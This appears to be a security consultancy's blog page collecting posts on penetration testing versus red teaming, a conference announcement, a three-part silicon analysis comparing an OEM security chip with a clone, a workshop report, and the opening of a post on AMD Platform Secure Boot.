INSIGHTS, RESEARCH | May 2, 2024

Untested Is Untrusted: Penetration Tests and Red Teaming Key to Mature Security Strategy

Organizations need to know how well their defenses can withstand a targeted attack. Red team exercises and penetration tests fit the bill, but which is right for your organization?

Information security at even well-defended enterprises is often a complex mesh of controls, policies, people, and point solutions dispersed across critical systems both inside and outside the corporate perimeter. Managing that murky situation can be challenging for security teams, many of whom are understaffed and forced to simply check as many of the boxes as they can on the organization’s framework of choice and hope for the best.

Even in a known hostile climate replete with ransomware, sophisticated bad actors, and costly data breaches, security teams are often pressured to deploy tools, coordinate with disparate IT teams, then left to stand guard: monitoring, analyzing, patching, responding, and recovering.

This largely reactive posture is table stakes for most defenders, but on its own, it leaves one important question hanging. How well will all these defenses work when bad guys come calling? Like an orchestra of talented musicians that have never had a dress rehearsal, or a well-conditioned team of athletes that have never scrimmaged, it’s difficult to know just how well the group will perform under real-world conditions. In information security in particular, organizations are often unsure if their defenses will hold in an increasingly hostile world–a world with endless vulnerabilities, devastating exploits, and evolving attackers with powerful tools and expanding capabilities.

Security’s Testing Imperative

At its heart, effective security infrastructure is a finely engineered system. Optimizing and maintaining that system can benefit greatly from the typical engineer’s inclination to both build and test.  From bird feeders to bridges, sewing machines to skyscrapers, no industrial product survives the journey from design to production without being pushed to its limits – and beyond – to see how it will fare in actual use. Tensile strength, compressive parameters, shear forces, thermal capacity, points of failure, every potential weakness is fair game. The concept of stress testing is common in every engineering discipline. Security should be no exception.

Security systems aren’t subjected to blistering heat, abrasive friction, or crushing weight, of course. But the best ones are regularly probed, prodded, and pushed to their technical limits. To accomplish this, organizations turn to one of two core testing methodologies: the traditional penetration test, and the more robust red team exercise. Both penetration testing and red teaming are proven, well-documented approaches for establishing the effectiveness of an organization’s defenses,

Determining which one is best for a particular organization comes down to understanding how penetration tests and red team exercises work and how they differ in practice, core purpose, and scope.

Penetration Testing: Going Beyond Vulnerability Assessment

Penetration Tests (“pentests” for short) are a proactive form of application and infrastructure security evaluation in which an ethical hacker is authorized to scan an organization’s systems to discover weaknesses that could lead to compromise or a data breach.   The pentester’s objectives are to identify vulnerabilities in the client environment, exploit them to demonstrate the vulnerability’s impact, and document the findings.

Penetration testing is generally considered the next step up from traditional vulnerability assessments. Vulnerability assessments – usually the product of software-driven, automated scanning and reporting – expose many unaddressed weaknesses by cross-referencing the client’s systems and software with public lists of known vulnerabilities. Penetration testing takes the discipline a step further, adding the expert human element in order to recreate the steps a real cybercriminal might take to compromise systems. Techniques such as vulnerability scanning, brute-force password attacks, web app exploitation, and social engineering can be included in the test’s stated parameters.

Penetration tests are more targeted and deliver a more accurate list of vulnerabilities present than a vulnerability assessment. Because exploitation is often included, the pentest shows client organizations which vulnerabilities pose the biggest risk of damage, helping to prioritize mitigation efforts. Penetration tests are usually contracted with strict guidelines for time and scope — and because internal stakeholders are generally aware the pentest is taking place — provide little value for measuring detection and response and provide no visibility into the security posture of IT assets outside the scope of the examination.

Penetration Testing in Action

Traditional penetration tests are a go-to approach for organizations that want to immediately address exploitable vulnerabilities and upgrade their approach beyond static vulnerability scanning. Pentests provide valuable benefits in use cases such as:

  • Unearthing hidden risk: Penetration tests identify critical weaknesses in a single system, app or network that automated scanning tools often miss. As a bonus, pentests weed out the false positives from machine scanning that can waste valuable security team resources.
  • Validating security measures: Penetration testing can help validate the effectiveness of security controls, policies, and procedures, ensuring they work as intended.
  • Governance and compliance: Penetration testing allows an organization to check and prove that security policies, regulations and other related mandates are being met, including those that explicitly require regular pentests.
  • Security training: The reported outcome of a penetration testmakes for a valuable training tool for both security teams and end users, helping them understand how vulnerabilities can impact their organization.

Business continuity planning: Penetration testing also supports the organization’s business continuity plan, identifying potential threats and vulnerabilities that could result in system downtime and data loss.

Red Team Exercises: Laser Focus Attacks, Big-Picture Results

Red Teams take a more holistic — and more aggressive — approach to testing an organization’s overall security under real-world conditions. Groups of expert ethical hackers simulate persistent adversarial attempts to compromise the target’s systems, data, corporate offices, and people.

Red team exercises focus on the same tactics, tools, and procedures (TTPs) used by real-world adversaries. Where penetration tests aim to uncover a comprehensive list of vulnerabilities, red teams emulate attacks that focus more on the damage a real adversary could inflict. Weak spots are leveraged to gain initial access, move laterally, escalate privileges, exfiltrate data, and avoid detection. The goal of the red team is really to compromise an organization’s most critical digital assets, its crown jewels. Because the red team’s activities are stealthy and known only to select client executives (and sometimes dedicated “blue team” defenders from the organization’s own security team), the methodology is able to provide far more comprehensive visibility into the organization’s security readiness and ability to stand up against a real malicious attack. More than simply a roster of vulnerabilities, it’s a detailed report card on defenses, attack detection, and incident response that enterprises can use to make substantive changes to their programs and level-up their security maturity.

Red Team Exercises in Action

Red team exercises take security assessments to the next level, challenging more mature organizations to examine points of entry within their attack surface a malicious actor may exploit as well as their detection response capabilities. Red teaming proves its mettle through:

  • Real-world attack preparation: Red team exercises emulate attacks that can help organizations prepare for the real thing, exposing flaws in security infrastructure, policy, process and more.
  • Testing incident response: Red team exercises excel at testing a client’s incident response strategies, showing how quickly and effectively the internal team can detect and mitigate the threat.
  • Assessing employee awareness: In addition to grading the security team,red teaming is also used to measure the security awareness among employees. Through approaches like spear phishing, business email compromise and on-site impersonation, red teams highlight areas where additional employee training is needed.
  • Evaluating physical security: Red teams go beyond basic cyberthreats, assessing the effectiveness of physical security measures — locks, card readers, biometrics, access policies, and employee behaviors — at the client’s various locations.

Decision support for security budgets: Finally, red team exercises provide solid, quantifiable evidence to support hiring, purchasing and other security-related budget initiatives aimed at bolstering a client’s security posture and maturity

Stress Test Shootout: Red Teams and Penetration Tests Compared

When choosing between penetration tests and red team exercises, comparing and contrasting key attributes is helpful in determining which is best for the organization given its current situation and its goals:

Penetration testsRed team exercises
ObjectiveIdentify vulnerabilities en masse and strengthen securitySimulate real-world attacks and test incident response
ScopeTightly defined and agreed upon before testing beginsGoal oriented often encompassing the entire organization’s technical, physical, and human assets
DurationTypically shorter, ranging from a few days to a few weeksLonger, ranging from several weeks to a few months
RealismMay not faithfully simulate real-world threatsDesigned to closely mimic real-world attack scenarios
TargetsSpecific systems or applicationsEntire organization, including human, physical, and digital layers
NotificationTeams are notified and aware the test is taking placeUnannounced to mimic real attacks and to test responses
Best for…Firms just getting started with proactive testing or those that perform limited tests on a regular cycleOrgs with mature security postures that want to put their defenses the test

It’s also instructive to see how each testing methodology might work in a realistic scenario.

Scenario 1: Pentesting a healthcare organization

Hospitals typically feature a web of interconnected systems and devices, from patient records and research databases to Internet-capable smart medical equipment. Failure to secure any aspect can result in data compromise and catastrophic system downtime that violates patient privacy and disrupts vital services. A penetration test helps unearth a broad array of security weak spots, enabling the hospital to maintain systems availability, data integrity, patient confidentiality and regulatory compliance under mandates such as the Health Insurance Portability and Accountability Act (HIPAA).

A pentest for a healthcare org might focus on specific areas of the hospital’s network or critical applications used to track and treat patients. If there are concerns around network-connected medical equipment and potential impact to patient care, a hardware pentest can uncover critical vulnerabilities an attacker could exploit to gain access, modify medication dosage, and maintain a network foothold. The results from the pentest helps identify high risk issues and prioritize remediation but does little in the way of determining if an organization is ready and capable of responding to a breach.

Scenario 2: Red teaming a healthcare organization

While the pentest is more targeted and limited in scope, a red team exercise against the same healthcare organization includes not only all of the networks and applications, but also the employees and physical locations. Here, red team exercises focus on bypassing the hospital’s defenses to provide valuable insights into how the organization might fare against sophisticated, real-world attackers. These exercises expose technical weaknesses, risky employee behaviors, and process shortcomings, helping the hospital continually bolster its resilience.

The red team performs reconnaissance initially to profile the employees, offices, and external attack surface looking for potential avenues for exploitation and initial access. An unmonitored side entrance, someone in scrubs tailgating a nurse into a secure area, or a harmless-looking spearphish, a red team will exploit any weakness necessary to reach its goals and act on its objectives. The goal may be to access a specific fake patient record and modify the patient’s contact information or the team is expected to exfiltrate data to test the hospital’s network monitoring capabilities. In the end, the healthcare organization will have a better understanding of its readiness to withstand a sophisticated attack and where to improve its defenses and ability to respond effectively.

Simulated Attacks, Authentic Results

In security, as in any other kind of engineered system, without testing there can be no trust. Testing approaches like penetration tests and red team exercises are paramount for modern, digital-centric organizations operating in a hostile cyber environment.

These simulated attack techniques help to identify and rectify technical as well as procedural vulnerabilities, enhancing the client’s overall cybersecurity posture. Taken together, regular penetration tests and red team exercises should be considered integral components of a robust and mature cybersecurity strategy. Most organizations will start with penetration testing to improve the security of specific applications and areas of their network, then graduate up to red team exercises that measure the effectiveness of its security defenses along with detection and response capabilities.

Organizations that prioritize such testing methods will be better equipped to defend against threats, reduce risks, and maintain the trust of their users and customers in today’s challenging digital threatscape.

INSIGHTS | April 19, 2024

Lessons Learned and S.A.F.E. Facts Shared During Lisbon’s OCP Regional Summit

I don’t recall precisely what year the change happened, but at some point, the public cloud became critical infrastructure with corresponding high national security stakes. That reality brought rapid maturity and accompanying regulatory controls for securing and protecting the infrastructure and services of cloud service providers (CSPs).

Next week at the 2024 OCP Regional Summit in Lisbon, teams will be sharing new security success stories and diving deeper into the technical elements and latest learnings in securing current generation cloud infrastructure devices. IOActive will be present throughout the event, delivering new insights related to OCP S.A.F.E. and beyond.

First thing Thursday morning (April 25, 8:50am – 9:10am | Floor 1 – Auditorium IV | Security and Data Protection track), our suave Director of Services, Alfredo Pironti, and rockstar senior security consultant and researcher, Sean Rivera, will present “Recent and Upcoming Security Trends in Cloud Low-level Hardware Devices,” where they dive deep into a new survey of real-world security issues and flaws that IOActive has encountered over recent years.

I’m lucky enough to have had a preview of the talk, and I’m confident it will open attendees’ eyes to the types of systemic vulnerabilities specialized security testing can uncover. Sean and Alfredo share these new insights on the threats associated with NVMe-based SSD disks and SR-IOC enabled cards before covering recommendations on improving secure development processes and proposing new testing scope improvements.

Shortly afterwards on Thursday (April 25, 9:55am – 10:15am | Floor 1 – Auditorium IV | Security and Data Protection track), Alfredo Pironti will be back on stage for a panel session focused on “OCP S.A.F.E. Updates” where he, along with Alex Tzonkov of AMD and Eric Eilertson of Microsoft, will discuss the latest progress and innovations behind the OCP S.A.F.E. program. I think a key component of the panel discussion will be the learnings and takeaways from the firsthand experiences of early adopters. You know how it goes…the difference between theory and practice.

I’m pretty sure both sessions will be recorded, so folks that can’t make it to lovely Lisbon this time round should be able to watch these IOActive stars present and share their knowledge and insights in the days or weeks following the OCP summit. You’ll find more information about OCP S.A.F.E. and how IOActive has been turning theory into practice on our OCP S.A.F.E. Certified Assessor page.

Both Alfredo and Sean, along with a handful of other IOActive folks, will be present throughout the Lisbon summit. Don’t be shy, say hi!

INSIGHTS, RESEARCH | April 17, 2024

Accessory Authentication – part 3/3

This is Part 3 of a 3-Part series. You can find Part 1 here and Part 2 here.

Introduction

In this post, we continue our deep dive comparison of the security processors used on a consumer product and an unlicensed clone. Our focus here will be identifying and characterizing memory arrays.

Given a suitably deprocessed sample, memories can often be recognized as such under low magnification because of their smooth, regular appearance with distinct row/address decode logic on the perimeter, as compared to analog circuitry (which contains many large elements, such as capacitors and inductors) or autorouted digital logic (fine-grained, irregular structure).

Identifying memories and classifying them as to type, allows the analyst to determine which ones may contain data relevant to system security and assess the difficulty and complexity of extracting their content.

OEM Component

Initial low-magnification imaging of the OEM secure element identified 13 structures with a uniform, regular appearance consistent with memory.

Higher magnification imaging resulted in three of these structures being reclassified as non-memory (two as logic and one as analog), leaving 10 actual memories.

Figure 1. Logic circuitry initially labeled as memory due to its regular structure
Figure 2. Large capacitor in analog block

Of the remaining 10 memories, five distinct bit cell structures were identified:

  • Single-port (6T) SRAM
  • Dual-port (8T) SRAM
  • Mask ROM
  • 3T antifuse
  • Floating gate NOR flash

Single-port SRAM

13 instances of this IP were found in various sized arrays, with capacities ranging from 20 bits x 8 rows to 130 bits x 128 rows.

Some of these memories include extra columns, which appear to be intended as spares for remapping bad columns. This is a common practice in the semiconductor industry to improve yield: memories typically cover a significant fraction of the die surface and thus are responsible for a large fraction of manufacturing defects. If the device can remain operable despite a defect in a memory array, the overall yield of usable chips will be higher.

Figure 3. Substrate overview of a single-port SRAM array
Figure 4. Substrate closeup view of single-port SRAM bit cells

Dual-port SRAM

Six instances of this IP were found, each containing 320 bit cells (40 bytes).

Figure 5. Dual-port SRAM cells containing eight transistors

Mask ROM

Two instances of this IP were found, with capacities of 256 Kbits and 320 Kbits respectively. No data was visible in a substrate view of the array.

Figure 6. Substrate view of mask ROM showing no data visible

A cross section (Figure 7) showed irregular metal 1 patterns as well as contacts that did not go to any wires on metal 1, strongly suggesting this was a metal 1 programmed ROM. A plan view of metal 1 (Figure 8) confirms this. The metal 1 pattern also shows that the transistors are connected in series strings of 8 bits (with each transistor in the string either shorted by metal or not, in order to encode a logic 0 or 1 value), completing the classification of this memory as a metal 1 programmed NAND ROM.

Figure 7. Cross section of metal 1 programmed NAND ROM showing irregular metal patterns and via with unconnected top
Figure 8. Top-right corner of one ROM showing data bits and partial address decode logic

IOActive successfully extracted the contents of both ROMs and determined that they were encrypted. Further reverse engineering would be necessary to locate the decryption circuitry in order to make use of the dumps.

Antifuse

Five instances of this IP were found, four with a capacity of 4 rows x 32 bits (128 bits) and one with a capacity of 32 rows x 64 bits (2048 bits).

The bit cells consist of three transistors (two in series and one separate) and likely function by gate dielectric breakdown: during programming, high voltage applied between a MOSFET gate and the channel causes the dielectric to rupture, creating a short circuit between the drain and gate terminals.

Antifuse memory is one-time programmable and is expensive due to the very low density (significantly larger bit cell compared to flash or ROM); however, it offers some additional security because the ruptured dielectric is too thin to see in a top-down view of the array, rendering it difficult to extract the contents of the bit cells. It is also commonly used for small memories when the complexity and re-programmability of flash memory is unnecessary, such as for storing trim values for analog blocks or remapping data for repairing manufacturing defects in SRAM arrays.

Figure 9. Antifuse array
Figure 10. Cross section of antifuse bit cells

Flash

A single instance of this IP was found, with a capacity of 1520 Kbits.

This memory uses floating-gate bit cells connected in a NOR topology, as is common for embedded flash memories on microcontrollers.

Figure 11. Substrate plan view of bit cells
Figure 12. Cross section of NOR Flash memory

Clone Component

Floorplan Overview

Figure 13. Substrate view of clone secure element after removal of metal and polysilicon

The secure element from the clone device contains three obvious memories, located at the top right, bottom left, and bottom right corners.

Lower-left Memory

The lower-left memory consists of a bit cell array with addressing logic at the top, left, and right sides. Looking closely, it appears to be part of a larger rectangular block that contains a large region of analog circuitry above the memory, as well as a small amount of digital logic.

This is consistent with the memory being some sort of flash (likely the primary code and data storage for the processor). The large analog block is probably the high voltage generation for the program/erase circuitry, while the small digital block likely controls timing of program/erase operations.  

The array appears to be structured as 32 bits (plus 2 dummy or ECC columns) x 64 blocks wide, by 2 bits * 202 rows (likely 192 + 2 dummy features + 8 spare). This gives an estimated usable array capacity of 786432 bits (98304 bytes, 96kB).

Figure 14. Overview of bottom left (flash) memory
Figure 15. SEM substrate image of flash memory

A cross section was taken, which did not show floating gates (as compared to the OEM component). This suggests that this component is likely using a SONOS bit cell or similar charge-trapping technology.

Lower-right Memory

The lower-right memory consists of two identical blocks side-by-side, mirrored left-to-right. Each block consists of 128 columns x 64 cells x 3 blocks high, for a total capacity of 49152 bits (6144 bits, 6 kB).

Figure 16. Lower-right memory

At higher magnification, we can see that the individual bit cells consist of eight transistors, indicative of dual-port SRAM—perhaps some sort of cache or register file.

Figure 17. Dual-port SRAM on clone secure element (substrate)
Figure 18. Dual-port SRAM on clone secure element (metal 1)

Upper-right Memory

The upper – right memory consists of a 2 x 2 grid of identical tiles, each 128 columns x 160 rows (total capacity 81920 bits/10240 bytes/10 kB).

Figure 19. Upper-right SRAM array

Upon closer inspection, the bit cell consists of six transistors arranged in a classic single-port SRAM structure.

Figure 20. SEM substrate image of 6T SRAM cells
Figure 21. SEM metal 1 image of 6T SRAM cells

Concluding Remarks

The OEM component contains two more memory types (mask ROM and antifuse) than the clone component. It has double the flash memory and nearly triple the persistent storage (combined mask ROM and flash) capacity of the clone, but slightly less SRAM.

Overall, the memory technology of the clone component is significantly simpler and lower cost.

Overall Conclusions

OEMs secure their accessory markets for the following reasons:

  • To ensure an optimal user experience for their customers
  • To maintain the integrity of their platform
  • To secure their customers’ personal data
  • To secure revenue from accessory sales

OEMs routinely use security chips to protect their platforms and accessories; cost is an issue for OEMs when securing their platforms, which potentially can lead to their security being compromised.

Third-party solution providers, on the other hand:

  • Invest in their own labs and expertise to extract the IP necessary to make compatible solutions
  • Employ varied attack vectors with barriers of entry ranging from non-invasive toolsets at a cost of $1,000 up, to an invasive, transistor-level Silicon Lab at a cost of several million dollars
  • Often also incorporate a security chip to secure their own solutions, and to in turn lock out their competitors
  • Aim to hack the platform and have the third-party accessory market to themselves for as long as possible
INSIGHTS, RESEARCH |

Accessory Authentication – part 2/3

This is Part 2 of a 3-Part series. You can find Part 1 here and Part 3 here.

Introduction

In this post, we continue our deep dive comparison of the security processors used on a consumer product and an unlicensed clone. Our focus here will be comparing manufacturing process technology.

We already know the sizes of both dies, so given the gate density (which can be roughly estimated from the technology node or measured directly by locating and measuring a 2-input NAND gate) it’s possible to get a rough estimate for gate count. This, as well as the number of metal layers, can be used as metrics for overall device complexity and thus difficulty of reverse engineering.

For a more accurate view of device complexity, we can perform some preliminary floorplan analysis of each device and estimate the portions of die area occupied by:

  • Analog logic (generally uninteresting)
  • Digital logic (useful for gate count estimates)
  • RAM (generally uninteresting aside from estimating total bit capacity)
  • ROM/flash (allows estimating capacity and, potentially, difficulty of extraction)

OEM Component

We’ll start with the OEM secure element and take a few cross sections using our dual-beam scanning electron microscope/focused ion beam (SEM/FIB). This instrument provides imaging, material removal, and material deposition capabilities at the nanoscale.

Figure 1. SEM image showing FIB cross section of OEM component

To cross section a device, the analyst begins by using deposition gases to create a protective metal cap over the top of the region of interest. This protects the top surface from damage or contamination during the sectioning process. This is then followed by using the ion beam to make a rough cut a short distance away from the region of interest, then a finer cut to the exact location. The sample can then be imaged using the electron beam.

Figure 1 shows a large rectangular hole cut into the specimen, with the platinum cap at top center protecting the surface. Looking at the cut face, many layers of the device are visible. Upon closer inspection (Figure 2), we can see that this device has four copper interconnect layers followed by a fifth layer of aluminum.

Figure 2. Cross section with layers labeled
Figure 3. Cross-section view of OEM component showing individual transistor channels

At higher magnification (Figure 3), we can clearly see individual transistors. The silicon substrate of the device (bottom) has been etched to enhance contrast, giving it a rough appearance. The polysilicon transistor gates, seen end-on, appear as squares sitting on the substrate. The bright white pillars between the gates are tungsten contacts, connecting the source and drain terminals of each transistor to the copper interconnect above.

Figure 4. 6T SRAM bit cells on OEM component

Based on measurements of the gates, we conclude that this device is made on a 90 nm technology:

  • Contacted gate pitch: 282 nm
  • M1 pitch: 277 nm
  • 6T SRAM bit cell (Figure 4): 1470 x 660 nm (0.97 µm2)

We can also use cross sections to distinguish between various types of memory. Figure 5 is a cross section of one of the memory arrays of the OEM device, showing a distinctive double-layered structure instead of the single polysilicon gates seen in Figure 3. This is a “floating gate” nonvolatile memory element; the upper control gate is energized to select the cell while the lower floating gate stores charge, representing a single bit of memory data.

The presence of metal contacts at both sides of each floating gate transistor (rather than at either end of a string of many bits) allows us to complete the classification of this memory as NOR flash, rather than NAND.

Figure 5. Cross section of NOR flash memory on OEM component showing floating gates

The overall device is approximately 2400 x 1425 µm (3.42 mm2), broken down as:

  • 67% (2.29 mm2): memories and analog IP blocks
  • 33% (1.13 mm2): standard cell digital logic

Multiplying the logic area by an average of published cell library density figures for the 90nm node results in an estimated 475K gates of digital logic (assuming 100% density) for the OEM security processor. The actual gate count will be less than this estimate as there are some dummy/filler cells in less dense areas of the device.

Clone Component

Performing a similar analysis on the clone secure element, we see five copper and one aluminum metal layers (Figure 6).

Figure 6. Cross section of clone security processor showing layers
Figure 7. Closeup of SRAM transistors from clone security processor

Interestingly, the clone secure element is made on a more modern process node than the OEM component:

  • Contacted gate pitch: 225 nm
  • Minimum poly pitch: 158 nm
  • SRAM bit cell: 950 x 465 nm (0.45 µm2)

The transistor gates appear to still be polysilicon rather than metal.

Figure 8. NAND2 cell from clone component, substrate view with metal and polysilicon removed

These values are in-between those reported for the 65 nm and 45 nm nodes, suggesting this device is made on a 55 nm technology. The lack of metal gates (which many foundries began using at the 45 nm node) further reinforces this conclusion.

The overall device is approximately 1190 x 1150 µm (1.36 mm2), broken down as:

  • 37% (0.50 mm2): memories
  • 27% (0.36 mm2): analog blocks and bond pads
  • 31% (0.42 mm2): standard cell digital logic
  • 5% (0.07 mm2): filler cells, seal ring, and other non-functional areas

Given the roughly 0.42 mm2 of logic and measured NAND2 cell size of 717 x 1280 nm (0.92 µm2 or 1.08M gates/mm2 at 100% utilization), we estimate a total gate count of no more than 450K—slightly smaller than the OEM secure element. The actual number is likely quite a bit less than this, as a significant percentage (higher than on the OEM part) of the logic area is occupied by dummy/filler cells.

In part 3, we continue our deep dive comparison of the security processors used on a consumer product and an unlicensed clone. There we will focus on identifying and characterizing the memory arrays.

INSIGHTS, RESEARCH |

Accessory Authentication – Part 1/3

This is Part 1 of a 3-Part series. You can find Part 2 here and Part 3 here.

Introduction

Manufacturers of consumer electronics often use embedded security processors to authenticate peripherals, accessories, and consumables. Third parties wishing to build unlicensed products (clones) within such an ecosystem must defeat or bypass this security for their products to function correctly.

In this series, the IOActive silicon lab team will take you on a deep dive into one such product, examining both the OEM product and the clone in detail.

Fundamentally, the goal of a third party selling an unlicensed product is for the host system to recognize their product as authentic. This can be achieved by extracting key material from an OEM or licensed accessory and putting it on a new processor (difficult, but allows the third party to manufacture of an unlimited number of clones) or by recycling security processors from damaged or discarded accessories (low effort since there is no need to defeat protections on the secure element, but the number of clones is limited by the number of security chips that the third party can find and recycle). In some cases, it may also be possible to bypass the cryptographic authentication entirely by exploiting implementation or protocol bugs in the authentication handshake.

We’ll begin our analysis by comparing the security processors from an OEM and clone device to see which path was taken in this case. The first step is to locate the processors, which can be challenging since security chips tend to have deliberately confusing or nondescript markings to frustrate reverse-engineering efforts.

Package Comparison

Figure 1. Security processor from OEM device
Figure 2. Security processor from clone device

Comparing the top-side markings, we see:

  • The first three digits of the first line are different.
  • The second line is identical.
  • The third line is completely different: three letters and three numbers on the clone versus one letter and four numbers on the OEM part.
  • The font weight of the laser engraving is lighter on the clone and heavier on the OEM.
  • There is no manufacturer logo marked on either device.
  • The pin 1 marking dot of the OEM part has a well-defined edge, while the pin 1 marker of the clone has a small ring of discoloration around it.

Both components are packaged in an 8-pin 0.5 mm pitch DFN with a thermal pad featuring a notch at pin 1 position. No distinction is visible between the devices from the underside.

Figure 3. Underside of clone component

Looking from the side, we see that the clone package is significantly thicker.

Figure 4. Side view of OEM component
Figure 5. Side view of clone component

Top Metal Comparison

At this stage of the analysis, it seems likely that the devices are different given the packaging variations, but this isn’t certain. Semiconductor vendors occasionally change packaging suppliers or use multiple factories to improve supply chain robustness, so it’s entirely possible that these components contain the same die but were packaged at different facilities. In order to tell for sure, we need to depackage them and compare the actual silicon.

After depackaging, the difference is obvious, even before putting the samples under the microscope. The OEM die is rectangular and about 2.6x the area of the clone die (3.24 mm2 for the OEM versus 1.28 mm2 for the clone). It also has a yellow-green tint to it, while the clone is pink.

Figure 6. Top metal image of OEM die
Figure 7. Top metal image of clone die

The OEM die has five gold ball bonds, three in the top left and two in the bottom left.

In contrast, the clone die has 11 pads along the top edge. Two are narrower than the rest and appear intended for factory test only, two redundant power/ground pads are full sized but unbonded (showing only probe scrub marks from factory test), and the remaining seven have indentations from copper ball bonds (which were chemically removed to leave a flat specimen surface).

Figure 8. Used bond pad on clone die (left, bond ball removed) vs. unused pad (right, showing probe mark)

The OEM die has no evidence of an antitamper mesh; however, the surface appears to be completely covered by a dense grid of power/ground lines in-between larger high-current power distribution buses. The only exception is the far-right side, which is only covered by CMP filler (dummy metal features serving no electrical function, but which aid in manufacturability). Since sensitive data lines are not exposed on the top layer, the device is still protected against basic invasive attacks.

The clone die has large power and ground distribution buses on the top edge near the bond pads, while the remainder of the surface is covered by a fine mesh of wires clearly intended to provide tamper resistance. Typically, secure elements will fail to boot and/or erase flash if any of these lines are cut or shorted while the device is under power.

Figure 9. Antitamper mesh on the clone die

Neither die has any vendor logo or obvious identifying markings on it. The OEM part has no markings whatsoever; the clone part has mask revision markings suggesting six metal layers and a nine-digit alphanumeric ID code “CID1801AA” (which returned no hits in an Internet search).

Figure 10. Die markings on clone secure processor

Concluding Thoughts

The clone security processor is clearly a different device from the OEM part rather than a recycled chip. This means that the third party behind the clone must have obtained the authentication key somehow and flashed it to their own security processor.

Interestingly, the clone processor is also a secure element with obvious antitamper features! We believe that the most likely rationale is that the third party is attempting to stifle further competition in the market—they already have to share the market with the OEM but are trying to avoid additional clones becoming available.

The clone part also looks very similar to the OEM part upon casual inspection—both are packaged in the same 8-pin DFN form factor and have markings that closely resemble one another. Normally this is a sign of a counterfeit device; however, there is little chance of the OEM buying their security chip from an untrustworthy source, so it seems doubtful that the clone chip manufacturer was intending to fool the OEM into using their part. One possible explanation is that the authentication scheme was defeated by a fourth party, not the manufacturer of the clone accessory, and that they produced this device as a drop-in equivalent to the OEM security processor to simplify design of clones. Using a footprint compatible package and marking it with the same ID number would make sense in this scenario.

In the next part of this series, we’ll compare the manufacturing process technology used on the two components.

INSIGHTS | March 27, 2024

IOActive Presents at HARRIS 2024, a Unique Workshop for Chip Reverse Engineering | Tony Moor

The Hardware Reverse Engineering Workshop (HARRIS) is the first ever annual workshop devoted solely to chip reverse engineering, and 2024 was its second year. IOActive has been present both years, and this year I attended to see what all the fuss was about.

Background

The workshop is organized by the Embedded Security group of the Max Planck Institute for Security and Privacy (MPI-SP) together with Cyber Security in the Age of Large-Scale Adversaries (CASA) and Ruhr-University Bochum (RUB).

Christof Paar is a founding member of MPI-SP, and HARRIS is his latest brainchild, following the success of the annual Conference on Cryptographic Hardware and Embedded Systems (CHES) that first took place in 1999. Considering the strong links between HARRIS and MPI-SP, it’s no surprise that the 2023 and 2024 workshops were both held there.

Day One

Upon arrival at the venue, it became immediately apparent how well-organized the event is. Registration was simple, and there were already many casual conversations going on between the organizers and attendees. Privacy is respected by way of providing white lanyards to attendees who do not wish to be photographed, while the rest receive green. Affiliations are also optional on the name tags. I estimated the attendance to be around 125, compared to last year’s number of 90. I fully expect that trend to continue given the efforts of the fine organizing committee. From my discussions, I would estimate the split was roughly 50% academia, 25% industry, and 25% government. Geographically, Singapore, USA, Canada, and the vast majority of European countries were represented.

Front-row seats at the venue within RUB

The presentations on day one were divided into four sessions, the first being my personal favorite: Sample Preparation. 😊 The standout talk for me here was by REATISS, where they really brought home two things:

  1. What a difficult job chip deprocessing is
  2. How amazing REATISS are at chip deprocessing

One of several fascinating facts that the talk illustrated was how planarity is key during deprocessing, which of course I know only too well. What I didn’t know, however (or at least what I never got around to calculating), is that the planarity required across a 1mm2 area of interest within a <10nm technology node chip is 25nm. This is equivalent to the total area of a football (soccer) pitch being flat to within 2mm. Now that is flat!

REATISS also touched on the challenges of characterizing 3D NAND Flash as well as the novel materials being utilized in the latest IC technologies, such as cobalt metallization.

Allied High Tech Products followed this with an excellent presentation of how toolset selection and a well-thought-out workflow are vital in effective chip/package deprocessing. They also showcased the deprocessing of some extreme examples of modern multi-chip packages.

Between sessions, there were informal discussions divided into different challenges in hardware reverse engineering. This was a great idea and encouraged new and old connections to discuss their techniques without giving away too much of their secret sauce. 😉

Day One concluded with a dinner at a very nice restaurant in the Bochum city center, where attendees could sit with whomever they pleased and continue discussions over a pleasant meal and drinks.

Livingroom’ in Bochum; the dinner venue where we concluded Day One

While some continued to socialize into the small hours, I retired to my hotel for a good night of sleep to make sure I was prepared for another day of talks, making connections, and inevitably learning lots of new things.

Day Two

A slightly later start than yesterday, but it allowed folks like me to catch up a little on email and activity back at home base. Kicking off today was the keynote, which was superbly delivered by Paul Scheidt of Synopsys. Entitled “Perspectives from Four Decades of Chip Design,” Paul provided fascinating insight into his career in the semiconductor industry. He contrasted how much the industry has advanced, alongside several instances where ideas have been recycled from previous generations of chips and systems. Following that, there were three further sessions and some more opportunities for informal discussion (the full agendas are here). The focuses for the talks today included FPGA and netlist reverse engineering.

Of course, for the IOActive folks, the focus and highlight of Day Two was our very own Dr. Andrew Zonenberg, presenting during the afternoon case studies session. “Secure Element vs Cloners: A Case Study” explores an example wherein a platform may be protected for both revenues and user experience: the OEM wants to protect their accessory market as best they can, and for as long as they can, while competitors are racing to make a compatible version of the accessory in question. These are potentially billion-dollar markets, so the reward is high and invites third parties with serious budgets to perform full netlist extractions of chips in order to carry out Focused Ion Beam (FIB) attacks. A multi-million-dollar lab and the associated talent (the latter often being the most difficult part) does not seem too much of an investment when the return on that could be tens of millions of dollars per year!

Information on the range of IOActive’s Silicon Security Services can be found here.

Andrew presented flawlessly (no surprises there), and the talk was very well received indeed. Some interesting follow-up conversations ensued, which for me capped off a very worthwhile event.

Andrew in full flow – once he gets started, there is no stopping him!

Conclusions

HARRIS 2024 was an extremely well-run event, which is not surprising considering the success of CHES under Christof Paar. For anyone that is involved in semiconductor reverse engineering, this really is a must-go. The format works very well, provides plenty of opportunities for networking, and the quality of talks was exceptional. I was impressed and am very much looking forward to attending next year, and with something even more interesting for IOActive to present. Roll on HARRIS 2025!

INSIGHTS, RESEARCH | February 6, 2024

Exploring AMD Platform Secure Boot

Introduction

In our previous post on platform security (see here) we provided a brief introduction into platform security protections on AMD-based platforms and touched upon the topic of AMD Platform Secure Boot (PSB).

As a quick reminder, the purpose of PSB is to provide a hardware root-of-trust that will verify the integrity of the initial UEFI firmware phases, thereby preventing persistent firmware implants.

In this part of the blog series, we will dig deeper into the nitty gritty details of PSB, including a first glimpse of how it works under the hood, how it should be configured and, naturally, how various major vendors fail to do so.

Architecture

To begin, it is important to understand that the UEFI boot process is divided into various phases, referred to as SEC, PEI, DXE, BDS, TSL, RT and AL. For the sake of brevity, we won’t go into detail on the purpose of each phase as it has already been widely covered already (e.g. here).

